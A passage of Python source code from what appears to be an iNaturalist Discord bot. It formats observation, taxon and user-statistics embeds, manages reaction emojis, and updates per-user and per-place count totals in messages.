or unobserved_by or id_by:\r\n if user:\r\n title_query_response.user = None\r\n header = TAXON_COUNTS_HEADER\r\n elif unobserved_by:\r\n user = copy.copy(title_query_response.unobserved_by)\r\n title_query_response.unobserved_by = None\r\n header = TAXON_NOTBY_HEADER\r\n elif id_by:\r\n user = copy.copy(title_query_response.id_by)\r\n title_query_response.id_by = None\r\n header = TAXON_IDBY_HEADER\r\n formatted_counts = await format_user_taxon_counts(\r\n self, user, taxon, **count_args\r\n )\r\n elif place:\r\n formatted_counts = await format_place_taxon_counts(\r\n self, place, taxon, **count_args\r\n )\r\n title_query_response.place = None\r\n header = TAXON_PLACES_HEADER\r\n summary_counts = \"\"\r\n title_query_args = title_query_response.obs_args()\r\n summary_counts = await self.summarize_obs_spp_counts(taxon, title_query_args)\r\n if formatted_counts:\r\n description = f\"\\n{summary_counts}\\n{header}\\n{formatted_counts}\"\r\n else:\r\n description = summary_counts\r\n\r\n title_args = title_query_response.obs_args()\r\n url = obs_url_from_v1(title_args)\r\n full_title = f\"Observations {title_query_response.obs_query_description()}\"\r\n embed = make_embed(url=url, title=full_title, description=description)\r\n return embed\r\n\r\n async def format_obs(\r\n self,\r\n ctx,\r\n obs,\r\n with_description=True,\r\n with_link=False,\r\n compact=False,\r\n with_user=True,\r\n lang=None,\r\n ):\r\n \"\"\"Format an observation title & description.\"\"\"\r\n\r\n if lang and obs.taxon:\r\n taxon = await get_taxon(ctx, obs.taxon.id)\r\n else:\r\n taxon = obs.taxon\r\n taxon_summary = None\r\n community_taxon = None\r\n community_taxon_summary = None\r\n if not compact:\r\n taxon_summary = await ctx.inat_client.observations.taxon_summary(obs.id)\r\n if obs.community_taxon_id and obs.community_taxon_id != obs.taxon.id:\r\n community_taxon = ctx.inat_client.taxa.from_ids(\r\n obs.community_taxon_id, limit=1\r\n ).one()\r\n community_taxon_summary = (\r\n await ctx.inat_client.observations.taxon_summary(\r\n obs.id, community=1\r\n )\r\n )\r\n formatter = ObservationFormatter(\r\n obs,\r\n with_description=with_description,\r\n with_link=with_link,\r\n compact=compact,\r\n with_user=with_user,\r\n taxon=taxon,\r\n taxon_summary=taxon_summary,\r\n community_taxon=community_taxon,\r\n community_taxon_summary=community_taxon_summary,\r\n )\r\n return formatter.format(join_title=compact)\r\n\r\n async def make_obs_embed(self, ctx, obs, url, preview: Union[bool, int] = True):\r\n \"\"\"Return embed for an observation link.\"\"\"\r\n # pylint: disable=too-many-locals\r\n\r\n def format_image_title_url(taxon, obs, num):\r\n if taxon:\r\n title = format_taxon_name(taxon)\r\n else:\r\n title = \"Unknown\"\r\n title += f\" (Image {num} of {len(obs.photos)})\"\r\n mat = re.search(r\"/photos/(\\d+)\", obs.photos[num - 1].original_url)\r\n if mat:\r\n photo_id = mat[1]\r\n url = f\"{WWW_BASE_URL}/photos/{photo_id}\"\r\n else:\r\n url = None\r\n\r\n return (title, url)\r\n\r\n embed = make_embed(url=url)\r\n\r\n if obs:\r\n image_only = False\r\n error = None\r\n if preview:\r\n if isinstance(preview, bool):\r\n image_number = 1\r\n else:\r\n image_number = preview\r\n image_only = True\r\n if obs.photos and image_number >= 1 and image_number <= len(obs.photos):\r\n image = obs.photos[image_number - 1]\r\n embed.set_image(url=image.original_url)\r\n embed.set_footer(text=image.attribution)\r\n else:\r\n image_only = False\r\n if obs.photos:\r\n num = len(obs.photos)\r\n error = (\r\n f\"*Image number out of range; must be between 1 and {num}.*\"\r\n )\r\n else:\r\n error = \"*This observation has no images.*\"\r\n\r\n if image_only:\r\n (title, url) = format_image_title_url(obs.taxon, obs, image_number)\r\n embed.title = title\r\n embed.url = url\r\n embed.description = (\r\n f\"[Observation]({obs.uri}) \"\r\n f\"of [{obs.taxon.name}]({obs.taxon.url}) \"\r\n f\"by [{obs.user.login}]({obs.user.url})\"\r\n )\r\n else:\r\n lang = await get_lang(ctx)\r\n embed.title, summary = await self.format_obs(\r\n ctx, obs, lang=lang, with_link=True\r\n )\r\n if error:\r\n summary += \"\\n\" + error\r\n embed.description = summary\r\n else:\r\n mat = re.search(PAT_OBS_LINK, url)\r\n if mat:\r\n obs_id = int(mat[\"obs_id\"])\r\n logger.debug(\"Observation not found for: %s\", obs_id)\r\n embed.title = \"No observation found for id: %s (deleted?)\" % obs_id\r\n else:\r\n # If this happens, it's a bug (i.e. PAT_OBS_LINK should already match)\r\n logger.error(\"Not an observation: %s\", url)\r\n embed.title = \"Not an observation:\"\r\n embed.description = url\r\n\r\n return embed\r\n\r\n async def make_related_embed(self, ctx, taxa, missing_taxa=None):\r\n \"\"\"Return embed for related taxa.\"\"\"\r\n lang = await get_lang(ctx)\r\n names = format_taxon_names_for_embed(\r\n taxa, with_term=True, names_format=\"**The taxa:** %s\", lang=lang\r\n )\r\n taxa_iter = iter(taxa)\r\n first_taxon = next(taxa_iter)\r\n if len(taxa) == 1:\r\n taxon = first_taxon\r\n else:\r\n first_taxon_ancestor_ids = first_taxon.ancestor_ids\r\n first_set = set(first_taxon_ancestor_ids)\r\n remaining_sets = [set(taxon.ancestor_ids) for taxon in taxa_iter]\r\n common_ancestors = first_set.intersection(*remaining_sets)\r\n\r\n common_ancestor_indices = [\r\n first_taxon_ancestor_ids.index(ancestor_id)\r\n for ancestor_id in common_ancestors\r\n ]\r\n if not common_ancestor_indices:\r\n taxon = await get_taxon(ctx, ROOT_TAXON_ID)\r\n else:\r\n common_ancestor_id = first_taxon_ancestor_ids[\r\n max(common_ancestor_indices)\r\n ]\r\n taxon = await get_taxon(ctx, common_ancestor_id)\r\n\r\n description = (\r\n f\"{names}\\n**are related by {taxon.rank}**: \"\r\n f\"{format_taxon_name(taxon, lang=lang)}\\n\\n\"\r\n f\"[Species observations]({WWW_BASE_URL}/observations\"\r\n f\"?taxon_ids={','.join([str(t.id) for t in taxa])}&view=species)\"\r\n )\r\n embed = make_embed(title=\"Closest related taxon\", description=description)\r\n if missing_taxa:\r\n embed.set_footer(\r\n text=f\"Some taxa could not be found and were ignored: {','.join(missing_taxa)}\"\r\n )\r\n return (taxon, embed)\r\n\r\n async def get_image_embed(self, ctx, taxon, index=1):\r\n \"\"\"Make embed showing default image for taxon.\"\"\"\r\n lang = await get_lang(ctx)\r\n _taxon = await ctx.inat_client.taxa.populate(taxon)\r\n embed = make_image_embed(_taxon, index=index, lang=lang)\r\n return embed\r\n\r\n async def get_taxa_embed(\r\n self, ctx: Context, arg: Union[QueryResponse, Taxon], include_ancestors=True\r\n ):\r\n \"\"\"Make embed describing taxa record.\"\"\"\r\n formatter_params = {\r\n \"lang\": ctx.inat_client.ctx.get_inat_user_default(\"inat_lang\"),\r\n \"max_len\": MAX_EMBED_DESCRIPTION_LEN,\r\n \"with_url\": False,\r\n }\r\n if isinstance(arg, QueryResponse):\r\n place = arg.place\r\n if place:\r\n taxon = await ctx.inat_client.taxa.populate(\r\n arg.taxon, preferred_place_id=place.id\r\n )\r\n else:\r\n taxon = await ctx.inat_client.taxa.populate(arg.taxon)\r\n formatter_params[\"taxon\"] = taxon\r\n user = arg.user\r\n title_query_response = copy.copy(arg)\r\n if user:\r\n title_query_response.user = None\r\n elif place:\r\n title_query_response.place = None\r\n obs_args = title_query_response.obs_args()\r\n # i.e. any args other than the ones accounted for in taxon.observations_count\r\n if [arg for arg in obs_args if arg != \"taxon_id\"]:\r\n formatter_params[\"observations\"] = await self.api.get_observations(\r\n per_page=0, **obs_args\r\n )\r\n formatter = QualifiedTaxonFormatter(\r\n title_query_response, **formatter_params\r\n )\r\n elif isinstance(arg, Taxon):\r\n taxon = await ctx.inat_client.taxa.populate(arg)\r\n formatter_params[\"taxon\"] = taxon\r\n user = None\r\n place = None\r\n obs_args = {\"taxon_id\": taxon.id}\r\n formatter = TaxonFormatter(**formatter_params)\r\n else:\r\n logger.error(\"Invalid input: %s\", repr(arg))\r\n raise BadArgument(\"Invalid input.\")\r\n\r\n description = formatter.format(\r\n with_ancestors=include_ancestors, with_title=False\r\n )\r\n\r\n if user:\r\n formatted_counts = await format_user_taxon_counts(\r\n self, user, taxon, **arg.obs_args()\r\n )\r\n if formatted_counts:\r\n description += f\"\\n{TAXON_COUNTS_HEADER}\\n{formatted_counts}\"\r\n elif place:\r\n formatted_counts = await format_place_taxon_counts(\r\n self, place, taxon, **arg.obs_args()\r\n )\r\n if formatted_counts:\r\n description += f\"\\n{TAXON_PLACES_HEADER}\\n{formatted_counts}\"\r\n\r\n embed = make_taxa_embed(taxon, formatter, description)\r\n\r\n return embed\r\n\r\n async def get_user_project_stats(\r\n self, project_id, user, category: str = \"obs\", with_rank: bool = True\r\n ):\r\n \"\"\"Get user's ranked obs & spp stats for a project.\"\"\"\r\n\r\n async def get_unranked_count(*args, **kwargs):\r\n _kwargs = {\r\n \"user_id\": user.id,\r\n \"per_page\": 0,\r\n **kwargs,\r\n }\r\n if project_id:\r\n _kwargs[\"project_id\"] = project_id\r\n response = await self.api.get_observations(*args, **_kwargs)\r\n if response:\r\n return response[\"total_results\"]\r\n return \"unknown\"\r\n\r\n stats = None\r\n rank = None\r\n count = 0\r\n\r\n if category == \"taxa\":\r\n count = await get_unranked_count(\"species_counts\")\r\n if with_rank:\r\n rank = \"unranked\"\r\n return (count, rank)\r\n\r\n kwargs = {}\r\n if category == \"spp\":\r\n kwargs[\"order_by\"] = \"species_count\"\r\n # TODO: cache for a short while so users can compare stats but not\r\n # have to worry about stale data.\r\n if with_rank:\r\n if project_id:\r\n kwargs[\"project_id\"] = project_id\r\n response = await self.api.get_observers_stats(**kwargs)\r\n stats = response.get(\"results\")\r\n if stats:\r\n rank = next(\r\n (\r\n index + 1\r\n for (index, d) in enumerate(stats)\r\n if d[\"user_id\"] == user.id\r\n ),\r\n None,\r\n )\r\n if rank:\r\n ranked = stats[rank - 1]\r\n count = (\r\n ranked[\"species_count\"]\r\n if category == \"spp\"\r\n else ranked[\"observation_count\"]\r\n )\r\n if not (with_rank and rank):\r\n if category == \"spp\":\r\n count = await get_unranked_count(\"species_counts\", hrank=\"species\")\r\n else:\r\n count = await get_unranked_count() # obs\r\n if with_rank and not rank:\r\n rank = \">500\" if count > 0 else \"unranked\"\r\n return (count, rank)\r\n\r\n async def get_user_server_projects_stats(self, ctx, user):\r\n \"\"\"Get a user's stats for the server's main event projects.\"\"\"\r\n event_projects = None\r\n if ctx.guild:\r\n event_projects = await self.config.guild(ctx.guild).event_projects()\r\n if not event_projects:\r\n # No projects defined; implicit `ever` project for all-time stats\r\n event_projects = {\"ever\": {\"project_id\": 0, \"main\": True}}\r\n projects_by_id = {\r\n int(event_projects[prj][\"project_id\"]): prj\r\n for prj in event_projects\r\n if event_projects[prj].get(\"main\")\r\n }\r\n project_ids = [project_id for project_id in projects_by_id if project_id]\r\n projects = await self.api.get_projects(project_ids, refresh_cache=True)\r\n stats = []\r\n for project_id in projects_by_id:\r\n if project_id and project_id not in projects:\r\n continue\r\n # Project id 0 is a pseudo-project consisting of just one person\r\n # - this allows a server to define user's all-time stats to put in\r\n # `,me` without a project to track them\r\n # - set up this special stats item with:\r\n # `,inat set event ever 0 true`\r\n # - note that\r\n if project_id:\r\n user_project = UserProject.from_json(projects[project_id][\"results\"][0])\r\n is_member = user.id in user_project.observed_by_ids()\r\n else:\r\n is_member = True\r\n if is_member:\r\n abbrev = projects_by_id[int(project_id)]\r\n obs_stats = await self.get_user_project_stats(\r\n project_id, user, with_rank=False\r\n )\r\n spp_stats = await self.get_user_project_stats(\r\n project_id, user, category=\"spp\", with_rank=False\r\n )\r\n taxa_stats = await self.get_user_project_stats(\r\n project_id, user, category=\"taxa\", with_rank=False\r\n )\r\n emoji = event_projects[abbrev].get(\"emoji\")\r\n stats.append(\r\n (project_id, abbrev, emoji, obs_stats, spp_stats, taxa_stats)\r\n )\r\n return stats\r\n\r\n async def make_user_embed(self, ctx, member, user):\r\n \"\"\"Make an embed for user including user stats.\"\"\"\r\n description = f\"{member.mention} is {format_user_link(user)}\"\r\n if ctx.guild:\r\n event_projects = await self.config.guild(ctx.guild).event_projects() or {}\r\n main_projects = {\r\n event_project: event_projects[event_project]\r\n for event_project in event_projects\r\n if event_projects[event_project].get(\"main\")\r\n }\r\n # The \"master project\" for the server is hardcoded to be the event\r\n # project with the abbrev \"ever\"\r\n # - if it is defined and has a custom emoji set, use that\r\n # - otherwise, fall back to :white_check_mark: to indicate a\r\n # mod-added member in this server\r\n master_project = main_projects.get(\"ever\")\r\n master_project_emoji = (\r\n master_project and master_project.get(\"emoji\")\r\n ) or \":white_check_mark:\"\r\n if master_project_emoji and await has_valid_user_config(\r\n self, member, False\r\n ):\r\n description += f\" {master_project_emoji}\"\r\n embed = make_embed()\r\n project_stats = await self.get_user_server_projects_stats(ctx, user)\r\n for (\r\n project_id,\r\n abbrev,\r\n emoji,\r\n obs_stats,\r\n spp_stats,\r\n taxa_stats,\r\n ) in project_stats:\r\n obs_count, _obs_rank = obs_stats\r\n spp_count, _spp_rank = spp_stats\r\n taxa_count, _taxa_rank = taxa_stats\r\n obs_args = {\"user_id\": user.id}\r\n if int(project_id):\r\n obs_args[\"project_id\"] = project_id\r\n obs_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"observations\", \"verifiable\": \"any\"}\r\n )\r\n spp_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"species\", \"verifiable\": \"any\", \"hrank\": \"species\"}\r\n )\r\n taxa_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"species\", \"verifiable\": \"any\"}\r\n )\r\n fmt = (\r\n f\"[{obs_count:,}]({obs_url}) / [{spp_count:,}]({spp_url}) / \"\r\n f\"[{taxa_count:,}]({taxa_url})\"\r\n )\r\n embed.add_field(\r\n name=f\"Obs / Spp / Leaf taxa ({abbrev})\", value=fmt, inline=True\r\n )\r\n embed.description = description\r\n ids = user.identifications_count\r\n url = f\"[{ids:,}]({WWW_BASE_URL}/identifications?user_id={user.id})\"\r\n embed.add_field(name=\"Ids\", value=url, inline=True)\r\n return embed\r\n\r\n async def make_stats_embed(self, member, user, project):\r\n \"\"\"Make an embed for user showing stats for a project.\"\"\"\r\n embed = make_embed(\r\n title=project.title, url=project.url, description=member.mention\r\n )\r\n project_id = project.id\r\n obs_count, obs_rank = await self.get_user_project_stats(project_id, user)\r\n spp_count, spp_rank = await self.get_user_project_stats(\r\n project_id, user, category=\"spp\"\r\n )\r\n taxa_count, _taxa_rank = await self.get_user_project_stats(\r\n project_id, user, category=\"taxa\"\r\n )\r\n obs_args = {\"project_id\": project.id, \"user_id\": user.id}\r\n obs_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"observations\", \"verifiable\": \"any\"}\r\n )\r\n spp_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"species\", \"verifiable\": \"any\", \"hrank\": \"species\"}\r\n )\r\n taxa_url = obs_url_from_v1({**obs_args, \"view\": \"species\", \"verifiable\": \"any\"})\r\n fmt = (\r\n f\"[{obs_count:,}]({obs_url}) (#{obs_rank}) / \"\r\n f\"[{spp_count:,}]({spp_url}) (#{spp_rank}) / \"\r\n f\"[{taxa_count:,}]({taxa_url})\"\r\n )\r\n embed.add_field(\r\n name=\"Obs (rank) / Spp (rank) / Leaf taxa\", value=fmt, inline=True\r\n )\r\n return embed\r\n\r\n async def add_obs_reaction_emojis(self, ctx, msg, query_response: QueryResponse):\r\n \"\"\"Add obs embed reaction emojis.\"\"\"\r\n reaction_emojis = (\r\n OBS_PLACE_REACTION_EMOJIS\r\n if _add_place_emojis(query_response)\r\n else OBS_REACTION_EMOJIS\r\n if _add_user_emojis(query_response)\r\n else []\r\n )\r\n return await add_reactions_with_cancel(ctx, msg, reaction_emojis)\r\n\r\n async def add_taxon_reaction_emojis(\r\n self,\r\n ctx,\r\n msg,\r\n query_response: Union[QueryResponse, Taxon],\r\n taxonomy=True,\r\n with_keep=False,\r\n ):\r\n \"\"\"Add taxon embed reaction emojis.\"\"\"\r\n if isinstance(query_response, QueryResponse):\r\n taxon = query_response.taxon\r\n else:\r\n taxon = query_response\r\n query_response = None\r\n add_place_emojis = _add_place_emojis(query_response, True)\r\n if taxonomy and len(taxon.ancestor_ids) > 2:\r\n reaction_emojis = (\r\n TAXON_PLACE_REACTION_EMOJIS\r\n if add_place_emojis\r\n else TAXON_REACTION_EMOJIS\r\n if _add_user_emojis(query_response)\r\n else []\r\n )\r\n else:\r\n reaction_emojis = (\r\n NO_PARENT_TAXON_PLACE_REACTION_EMOJIS\r\n if add_place_emojis\r\n else NO_PARENT_TAXON_REACTION_EMOJIS\r\n if _add_user_emojis(query_response)\r\n else []\r\n )\r\n return await add_reactions_with_cancel(\r\n ctx, msg, reaction_emojis, with_keep=with_keep\r\n )\r\n\r\n async def send_embed_for_taxon_image(\r\n self, ctx, query_response: Union[QueryResponse, Taxon], index=1, with_keep=False\r\n ):\r\n \"\"\"Make embed for taxon image & send.\"\"\"\r\n msg = await ctx.send(\r\n embed=await self.get_image_embed(ctx, query_response, index)\r\n )\r\n # TODO: drop taxonomy=False when #139 is fixed\r\n # - This workaround omits Taxonomy reaction to make it less likely a\r\n # user will break the display; they can use `,last t` to get the taxon\r\n # display with taxonomy instead, if they need it.\r\n # - Note: a tester may still manually add the :regional_indicator_t:\r\n # reaction to test the feature in its current, broken state.\r\n return await self.add_taxon_reaction_emojis(\r\n ctx, msg, query_response, taxonomy=False, with_keep=with_keep\r\n )\r\n\r\n async def send_embed_for_taxon(\r\n self,\r\n ctx,\r\n query_response,\r\n include_ancestors=True,\r\n with_keep=False,\r\n related_embed=None,\r\n ):\r\n \"\"\"Make embed for taxon & send.\"\"\"\r\n taxon_embed = await self.get_taxa_embed(\r\n ctx, query_response, include_ancestors=include_ancestors\r\n )\r\n embeds = [taxon_embed]\r\n if related_embed:\r\n embeds.append(related_embed)\r\n msg = await ctx.send(embeds=embeds)\r\n return await self.add_taxon_reaction_emojis(\r\n ctx, msg, query_response, with_keep=with_keep\r\n )\r\n\r\n async def send_obs_embed(self, ctx, embed, obs, **reaction_params):\r\n \"\"\"Send observation embed and sound.\"\"\"\r\n\r\n async def hybrid_send(ctx, **kwargs):\r\n \"\"\"See d.py /discord/ext/commands/context.py send()\"\"\"\r\n if ctx.interaction is None:\r\n msg = await ctx.channel.send(**kwargs)\r\n else:\r\n if ctx.interaction.response.is_done():\r\n msg = await ctx.interaction.followup.send(**kwargs, wait=True)\r\n else:\r\n await ctx.interaction.response.send_message(**kwargs)\r\n msg = await ctx.interaction.original_response()\r\n return msg\r\n\r\n msg = None\r\n if obs and obs.sounds:\r\n async with self.sound_message_params(\r\n ctx.channel, obs.sounds, embed=embed\r\n ) as params:\r\n if params:\r\n msg = await hybrid_send(ctx, **params)\r\n if not msg:\r\n msg = await hybrid_send(ctx, embed=embed)\r\n\r\n return await add_reactions_with_cancel(ctx, msg, [], **reaction_params)\r\n\r\n def get_inat_url_ids(self, url):\r\n \"\"\"Match taxon_id & optional place_id/user_id from an iNat taxon or obs URL.\"\"\"\r\n taxon_id = None\r\n place_id = None\r\n inat_user_id = None\r\n mat = re.match(PAT_TAXON_LINK, url)\r\n if not mat:\r\n mat = re.match(PAT_OBS_TAXON_LINK, url)\r\n if mat:\r\n place_id = mat[\"place_id\"]\r\n inat_user_id = mat[\"user_id\"]\r\n if mat:\r\n taxon_id = mat[\"taxon_id\"]\r\n return (taxon_id, place_id, inat_user_id)\r\n\r\n async def maybe_update_user(\r\n self,\r\n ctx,\r\n msg: discord.Message,\r\n action: str,\r\n member: Optional[discord.Member] = None,\r\n user: Optional[User] = None,\r\n ):\r\n \"\"\"Add or remove user count in the embed if valid.\"\"\"\r\n inat_user = None\r\n if member:\r\n try:\r\n inat_user = await self.user_table.get_user(member)\r\n except LookupError:\r\n return\r\n if user:\r\n inat_user = user\r\n if not inat_user:\r\n return\r\n\r\n counts_pat = r\"(\\n|^)\\[[0-9, \\(\\)]+\\]\\(.*?\\) \" + inat_user.login\r\n inat_embed = msg.embeds[0]\r\n if inat_embed.taxon_id():\r\n taxon = await get_taxon(ctx, inat_embed.taxon_id())\r\n else:\r\n taxon = None\r\n # Observed by count add/remove for taxon:\r\n await self.edit_totals_locked(msg, taxon, inat_user, action, counts_pat)\r\n\r\n async def maybe_update_place(\r\n self,\r\n ctx,\r\n msg: discord.Message,\r\n user: discord.Member,\r\n action: str,\r\n place: Place = None,\r\n ):\r\n \"\"\"Add or remove place count in the embed if valid.\"\"\"\r\n try:\r\n await self.user_table.get_user(user)\r\n except LookupError:\r\n return\r\n\r\n update_place = None\r\n if place is None:\r\n try:\r\n update_place = await self.place_table.get_place(msg.guild, \"home\", user)\r\n except LookupError:\r\n return\r\n else:\r\n update_place = place\r\n\r\n inat_embed = msg.embeds[0]\r\n place_counts_pat = r\"(\\n|^)\\[[0-9, \\(\\)]+\\]\\(.*?\\) \" + re.escape(\r\n update_place.display_name\r\n )\r\n if inat_embed.taxon_id():\r\n taxon = await get_taxon(ctx, inat_embed.taxon_id())\r\n else:\r\n taxon = None\r\n await self.edit_place_totals_locked(\r\n msg, taxon, update_place, action, place_counts_pat\r\n )\r\n\r\n async def query_locked(self, msg, user, prompt, timeout):\r\n \"\"\"Query member with user lock.\"\"\"\r\n\r\n async def is_query_response(response):\r\n # so we can ignore '[p]cancel` too. doh!\r\n # - FIXME: for the love of Pete, why does response.content\r\n # contain the cancel command? then we could remove this\r\n # foolishness.\r\n prefixes = await self.bot.get_valid_prefixes(msg.guild)\r\n config = self.config.guild(msg.guild)\r\n other_bot_prefixes = await config.bot_prefixes()\r\n all_prefixes = prefixes + other_bot_prefixes\r\n ignore_prefixes = r\"|\".join(re.escape(prefix) for prefix in all_prefixes)\r\n prefix_pat = re.compile(r\"^({prefixes})\".format(prefixes=ignore_prefixes))\r\n return not re.match(prefix_pat, response.content)\r\n\r\n response = None\r\n if user.id not in self.predicate_locks:\r\n self.predicate_locks[user.id] = asyncio.Lock()\r\n lock = self.predicate_locks[user.id]\r\n if lock.locked():\r\n # An outstanding query for this user hasn't been answered.\r\n # They must answer it or the timeout must expire before they\r\n # can start another interaction.\r\n return\r\n\r\n async with self.predicate_locks[user.id]:\r\n query = await msg.channel.send(prompt)\r\n try:\r\n response = await self.bot.wait_for(\r\n \"message_without_command\",\r\n check=MessagePredicate.same_context(channel=msg.channel, user=user),\r\n timeout=timeout,\r\n )\r\n except asyncio.TimeoutError:\r\n with contextlib.suppress(discord.HTTPException):\r\n await query.delete()\r\n return\r\n\r\n # Cleanup messages:\r\n if await is_query_response(response):\r\n try:\r\n await msg.channel.delete_messages((query, response))\r\n except (discord.HTTPException, AttributeError):\r\n # In case the bot can't delete other users' messages:\r\n with contextlib.suppress(discord.HTTPException):\r\n await query.delete()\r\n else:\r\n # Response was a command for another bot: just delete the prompt\r\n # and discard the response.\r\n with contextlib.suppress(discord.HTTPException):\r\n await query.delete()\r\n response = None\r\n return response\r\n\r\n async def maybe_update_user_by_name(\r\n self, ctx, msg: discord.Message, member: discord.Member\r\n ):\r\n \"\"\"Prompt for a user by name and update the embed if provided & valid.\"\"\"\r\n try:\r\n await self.user_table.get_user(member)\r\n except LookupError:\r\n return\r\n response = await self.query_locked(\r\n msg,\r\n member,\r\n \"Add or remove which user (you have 15 seconds to answer)?\",\r\n 15,\r\n )\r\n if response:\r\n try:\r\n _user = await self.query.get_inat_user(ctx, response.content)\r\n except (LookupError, discord.ext.commands.errors.BadArgument) as error:\r\n error_msg = await msg.channel.send(error)\r\n await asyncio.sleep(15)\r\n with contextlib.suppress(discord.HTTPException):\r\n await error_msg.delete()\r\n return\r\n\r\n await self.maybe_update_user(ctx, msg, user=_user, action=\"toggle\")\r\n\r\n async def maybe_update_place_by_name(\r\n self, ctx, msg: discord.Message, user: discord.Member\r\n ):\r\n \"\"\"Prompt user for place by name and update the embed if provided & valid.\"\"\"\r\n try:\r\n await self.user_table.get_user(user)\r\n except LookupError:\r\n return\r\n response = await self.query_locked(\r\n msg,\r\n user,\r\n \"Add or remove which place (you have 15 seconds to answer)?\",\r\n 15,\r\n )\r\n if response:\r\n try:\r\n place = await self.place_table.get_place(\r\n msg.guild, response.content, user\r\n )\r\n except LookupError as error:\r\n error_msg = await msg.channel.send(error)\r\n await asyncio.sleep(15)\r\n with contextlib.suppress(discord.HTTPException):\r\n await error_msg.delete()\r\n return\r\n\r\n await self.maybe_update_place(ctx, msg, user, \"toggle\", place)\r\n\r\n async def maybe_update_taxonomy(self, ctx, message):\r\n \"\"\"Update taxonomy in taxon embed, if applicable.\"\"\"\r\n embeds = message.embeds\r\n inat_embed = embeds[0]\r\n description = inat_embed.description or \"\"\r\n new_description = re.sub(TAXONOMY_PAT, \"\", description)\r\n if new_description == description:\r\n full_taxon = await get_taxon(ctx, inat_embed.taxon_id())\r\n if full_taxon:\r\n formatted_names = format_taxon_names(\r\n full_taxon.ancestors, hierarchy=True\r\n )\r\n hierarchy = re.sub(HIERARCHY_PAT, \"\", formatted_names, 1)\r\n new_description = re.sub(\r\n NO_TAXONOMY_PAT,\r\n \" in:\\n\" + hierarchy + r\"\\1\",\r\n description,\r\n 1,\r\n )\r\n else:\r\n return\r\n inat_embed.description = new_description\r\n await message.edit(embed=inat_embed)\r\n\r\n async def update_totals(\r\n self,\r\n description,\r\n taxon,\r\n inat_user,\r\n action,\r\n inat_embed,\r\n counts_pat,\r\n ):\r\n \"\"\"Update the totals for the embed.\"\"\"\r\n unobserved = inat_embed.has_not_by_users()\r\n ident = inat_embed.has_id_by_users()\r\n if not (unobserved or ident):\r\n # Add/remove always results in a change to totals, so remove:\r\n description = re.sub(\r\n r\"\\n\\[[0-9, \\(\\)]+?\\]\\(.*?\\) \\*total\\*\", \"\", description\r\n )\r\n\r\n matches = re.findall(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?\\) (?P[-_a-z0-9]+)\", description\r\n )\r\n count_params = {**inat_embed.params}\r\n if action == \"remove\":\r\n # Remove the header if last one and the user's count:\r\n if len(matches) == 1:\r\n if unobserved:\r\n description = re.sub(TAXON_NOTBY_HEADER_PAT, \"\", description)\r\n elif ident:\r\n description = re.sub(TAXON_IDBY_HEADER_PAT, \"\", description)\r\n else:\r\n description = re.sub(TAXON_COUNTS_HEADER_PAT, \"\", description)\r\n description = re.sub(counts_pat + r\".*?((?=\\n)|$)\", \"\", description)\r\n else:\r\n # Add the header if first one and the user's count:\r\n if not matches:\r\n if unobserved:\r\n # not currently possible (new :hash: reaction starts 'by' embed)\r\n description += \"\\n\" + TAXON_NOTBY_HEADER\r\n elif ident:\r\n # not currently possible (new :hash: reaction starts 'by' embed)\r\n description += \"\\n\" + TAXON_IDBY_HEADER\r\n else:\r\n description += \"\\n\" + TAXON_COUNTS_HEADER\r\n user_id = inat_user.id\r\n if unobserved:\r\n count_params[\"unobserved_by_user_id\"] = user_id\r\n elif ident:\r\n count_params[\"ident_user_id\"] = user_id\r\n else:\r\n count_params[\"user_id\"] = user_id\r\n formatted_counts = await format_user_taxon_counts(\r\n self,\r\n inat_user,\r\n taxon,\r\n **count_params,\r\n )\r\n description += \"\\n\" + formatted_counts\r\n\r\n if not (unobserved or ident):\r\n matches = re.findall(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[?&]user_id=(?P\\d+).*?\\)\",\r\n description,\r\n )\r\n # Total added only if more than one user:\r\n if len(matches) > 1:\r\n user_ids = \",\".join(matches)\r\n count_params[\"user_id\"] = user_ids\r\n formatted_counts = await format_user_taxon_counts(\r\n self,\r\n user_ids,\r\n taxon,\r\n **count_params,\r\n )\r\n description += f\"\\n{formatted_counts}\"\r\n return description\r\n return description\r\n\r\n async def edit_totals_locked(\r\n self,\r\n msg,\r\n taxon,\r\n inat_user,\r\n action,\r\n counts_pat,\r\n ):\r\n \"\"\"Update totals for message locked.\"\"\"\r\n if msg.id not in self.reaction_locks:\r\n self.reaction_locks[msg.id] = asyncio.Lock()\r\n async with self.reaction_locks[msg.id]:\r\n # If permitted, refetch the message because it may have changed prior to\r\n # acquiring lock\r\n if (\r\n msg.guild\r\n and not msg.channel.permissions_for(msg.guild.me).read_message_history\r\n ):\r\n try:\r\n msg = await msg.channel.fetch_message(msg.id)\r\n except discord.errors.NotFound:\r\n return # message has been deleted, nothing left to do\r\n embeds = msg.embeds\r\n inat_embed = INatEmbed.from_discord_embed(embeds[0])\r\n description = inat_embed.description or \"\"\r\n mat = re.search(counts_pat, description)\r\n if action == \"toggle\":\r\n action = \"remove\" if mat else \"add\"\r\n\r\n if (mat and (action == \"remove\")) or (not mat and (action == \"add\")):\r\n description = await self.update_totals(\r\n description,\r\n taxon,\r\n inat_user,\r\n action,\r\n inat_embed,\r\n counts_pat,\r\n )\r\n if len(description) > MAX_EMBED_DESCRIPTION_LEN:\r\n raise NoRoomInDisplay(\r\n \"No more room for additional users in this display.\"\r\n )\r\n inat_embed.description = description\r\n # Image embeds use the footer for photo attribution.\r\n if not inat_embed.image:\r\n if not inat_embed.has_not_by_users() and re.search(\r\n r\"\\*total\\*\", inat_embed.description\r\n ):\r\n inat_embed.set_footer(\r\n text=\"User counts may not add up to \"\r\n \"the total if they changed since they were added. \"\r\n \"Remove, then add them again to update their counts.\"\r\n )\r\n else:\r\n if not inat_embed.image:\r\n inat_embed.set_footer(text=\"\")\r\n await msg.edit(embed=inat_embed)\r\n\r\n async def update_place_totals(\r\n self, description, taxon, place, action, inat_embed, place_counts_pat\r\n ):\r\n \"\"\"Update the place totals for the embed.\"\"\"\r\n # Add/remove always results in a change to totals, so remove:\r\n description = re.sub(r\"\\n\\[[0-9, \\(\\)]+?\\]\\(.*?\\) \\*total\\*\", \"\", description)\r\n\r\n matches = re.findall(r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?\\) (.*?)(?=\\n|$)\", description)\r\n count_params = 